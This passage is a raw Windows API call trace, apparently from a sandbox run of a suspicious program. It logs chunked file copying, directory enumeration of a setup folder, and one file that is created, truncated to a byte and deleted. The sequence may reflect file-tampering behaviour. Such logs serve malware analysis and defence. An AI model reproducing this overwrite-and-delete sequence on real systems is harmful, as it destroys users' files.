[0066.127] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0066.127] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0066.127] GetLastError () returned 0x0 [0066.127] SetLastError (dwErrCode=0x0) [0066.127] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0066.127] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0066.127] GetLastError () returned 0x0 [0066.127] SetLastError (dwErrCode=0x0) [0066.127] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0066.127] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0066.127] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x84fb8 [0066.127] ReadFile (in: hFile=0x428, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0066.129] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0066.129] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d630 [0066.129] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8d648 [0066.129] GetLastError () returned 0x0 [0066.130] SetLastError (dwErrCode=0x0) [0066.130] GetLastError () returned 0x0 [0066.130] SetLastError (dwErrCode=0x0) [0066.130] GetLastError () returned 0x0 [0066.130] SetLastError (dwErrCode=0x0) [0066.130] GetLastError () returned 0x0 [0066.130] SetLastError (dwErrCode=0x0) [0066.130] ReadFile (in: hFile=0x428, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0066.130] WriteFile (in: hFile=0x420, lpBuffer=0x8d648*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d648*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.131] GetLastError () returned 0x0 [0066.131] SetLastError (dwErrCode=0x0) [0066.132] GetLastError () returned 0x0 [0066.132] SetLastError (dwErrCode=0x0) [0066.132] GetLastError () returned 0x0 [0066.132] SetLastError (dwErrCode=0x0) [0066.132] GetLastError () returned 0x0 [0066.132] SetLastError (dwErrCode=0x0) [0066.132] ReadFile (in: hFile=0x428, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0066.132] WriteFile (in: hFile=0x420, lpBuffer=0x8d648*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d648*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.132] GetLastError () returned 0x0 [0066.132] SetLastError (dwErrCode=0x0) [0066.132] GetLastError () returned 0x0 [0066.132] SetLastError (dwErrCode=0x0) [0066.133] GetLastError () returned 0x0 [0066.133] SetLastError (dwErrCode=0x0) [0066.133] GetLastError () returned 0x0 [0066.133] SetLastError (dwErrCode=0x0) [0066.133] ReadFile (in: hFile=0x428, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0066.133] WriteFile (in: hFile=0x420, lpBuffer=0x8d648*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d648*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.133] GetLastError () returned 0x0 [0066.133] SetLastError (dwErrCode=0x0) [0066.133] GetLastError () returned 0x0 [0066.133] SetLastError (dwErrCode=0x0) [0066.133] GetLastError () returned 0x0 [0066.133] SetLastError (dwErrCode=0x0) [0066.134] GetLastError () returned 0x0 [0066.134] SetLastError (dwErrCode=0x0) [0066.134] ReadFile (in: hFile=0x428, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x358, lpOverlapped=0x0) returned 1 [0066.134] ReadFile (in: hFile=0x428, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0066.134] WriteFile (in: hFile=0x420, lpBuffer=0x8d648*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d648*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0066.134] GetLastError () returned 0x0 [0066.134] SetLastError (dwErrCode=0x0) [0066.134] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0066.134] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6d8 [0066.134] GetLastError () returned 0x0 [0066.134] SetLastError (dwErrCode=0x0) [0066.134] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d630 | out: hHeap=0x20000) returned 1 [0066.134] WriteFile (in: hFile=0x420, lpBuffer=0x8d648*, nNumberOfBytesToWrite=0x360, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x8d648*, lpNumberOfBytesWritten=0x327ef70*=0x360, lpOverlapped=0x0) returned 1 [0066.135] GetLastError () returned 0x0 [0066.135] SetLastError (dwErrCode=0x0) [0066.135] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0066.135] GetLastError () returned 0x0 [0066.135] SetLastError (dwErrCode=0x0) [0066.135] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0066.135] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0066.135] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6d8 | out: hHeap=0x20000) returned 1 [0066.135] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0066.135] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0066.135] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d648 | out: hHeap=0x20000) returned 1 [0066.135] CloseHandle (hObject=0x420) returned 1 [0066.136] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fb8 | out: hHeap=0x20000) returned 1 [0066.136] CloseHandle (hObject=0x428) returned 1 [0066.137] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0066.137] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0066.137] AreFileApisANSI () returned 1 [0066.137] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0066.137] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71758 [0066.137] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x71758, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1033\\SetupResources.dll") returned 46 [0066.137] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1033\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1033\\setupresources.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.138] GetFileType (hFile=0x428) returned 0x1 [0066.138] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0066.138] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x84fb8 [0066.138] GetLastError () returned 0xb7 [0066.138] SetLastError (dwErrCode=0xb7) [0066.138] WriteFile (in: hFile=0x428, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0066.139] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fb8 | out: hHeap=0x20000) returned 1 [0066.139] CloseHandle (hObject=0x428) returned 1 [0066.139] AreFileApisANSI () returned 1 [0066.139] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0066.139] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71960 [0066.139] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1033\\SetupResources.dll") returned 46 [0066.139] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1033\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1033\\setupresources.dll")) returned 1 [0066.141] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0066.141] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0066.141] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0066.141] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0066.141] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0066.141] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0066.141] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0066.141] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e570 | out: hHeap=0x20000) returned 1 [0066.141] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5b8 | out: hHeap=0x20000) returned 1 [0066.141] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6c0 | out: hHeap=0x20000) returned 1 [0066.141] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0066.141] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8bd10 | out: hHeap=0x20000) returned 1 [0066.141] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0066.141] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0066.141] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0066.141] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0066.141] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0066.141] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0066.141] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.141] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.141] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x1, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x1, nFileSizeHigh=0x0, nFileSizeLow=0x28bf8, dwReserved0=0x1, dwReserved1=0x0, cFileName="Դ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧賂̧⺊Ā̧붼聐̧㑍Ā̧肐\x07̧비聐莰\x08賂̧")) returned 0 [0066.141] FindClose (in: hFindFile=0x78090 | out: hFindFile=0x78090) returned 1 [0066.142] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0066.142] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0066.142] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0066.142] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0066.142] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0066.142] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0066.142] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0066.142] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0066.142] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0066.142] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x469e8 | out: hHeap=0x20000) returned 1 [0066.142] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0066.142] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0066.142] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0066.142] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0066.142] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0066.142] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0066.142] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0066.142] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0066.142] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0066.142] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69440 [0066.142] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0066.142] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0066.142] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69440 | out: hHeap=0x20000) returned 1 [0066.142] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.142] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.142] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.142] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.142] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0066.142] AreFileApisANSI () returned 1 [0066.142] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1035", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1035", lpUsedDefaultChar=0x0) returned 27 [0066.142] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0066.142] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.142] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.142] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0066.142] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0066.143] AreFileApisANSI () returned 1 [0066.143] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88428, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0066.143] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78250 [0066.143] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88428, cbMultiByte=-1, lpWideCharStr=0x78250, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1035") returned 27 [0066.143] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1035" (normalized: "c:\\588bce7c90097ed212\\1035"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0066.143] GetLastError () returned 0x5 [0066.143] GetLastError () returned 0x5 [0066.143] SetLastError (dwErrCode=0x5) [0066.143] GetLastError () returned 0x5 [0066.143] SetLastError (dwErrCode=0x5) [0066.143] GetLastError () returned 0x5 [0066.143] SetLastError (dwErrCode=0x5) [0066.143] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78250 | out: hHeap=0x20000) returned 1 [0066.143] AreFileApisANSI () returned 1 [0066.143] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88428, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0066.143] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x784d0 [0066.143] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88428, cbMultiByte=-1, lpWideCharStr=0x784d0, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1035") returned 27 [0066.143] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1035" (normalized: "c:\\588bce7c90097ed212\\1035"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0066.143] GetLastError () returned 0x5 [0066.143] GetLastError () returned 0x5 [0066.143] SetLastError (dwErrCode=0x5) [0066.143] GetLastError () returned 0x5 [0066.144] SetLastError (dwErrCode=0x5) [0066.144] GetLastError () returned 0x5 [0066.144] SetLastError (dwErrCode=0x5) [0066.144] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x784d0 | out: hHeap=0x20000) returned 1 [0066.144] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0066.144] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0066.144] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0066.144] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.144] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.144] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.144] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.144] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0066.144] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x690d0 [0066.144] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0066.144] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0066.144] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x690d0 | out: hHeap=0x20000) returned 1 [0066.144] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="1036", cAlternateFileName="")) returned 1 [0066.144] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0066.144] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0066.144] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0066.144] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0066.144] FindFirstFileExW (in: lpFileName="C:\\588bce7c90097ed212\\1035\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78310 [0066.144] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.144] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xe76, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0066.144] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0066.144] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0066.144] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0066.144] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0066.144] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0066.144] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0066.144] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0066.144] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0066.145] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0066.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0066.145] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0066.145] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46048 [0066.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0066.145] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0066.145] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0066.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0066.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0066.145] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0066.145] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0066.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0066.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0066.145] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0066.145] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0066.145] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0066.145] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71a30 [0066.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0066.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0066.145] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0066.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0066.145] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.145] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.145] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.145] InitOnceExecuteOnce (in: InitOnce=0x1086e18, 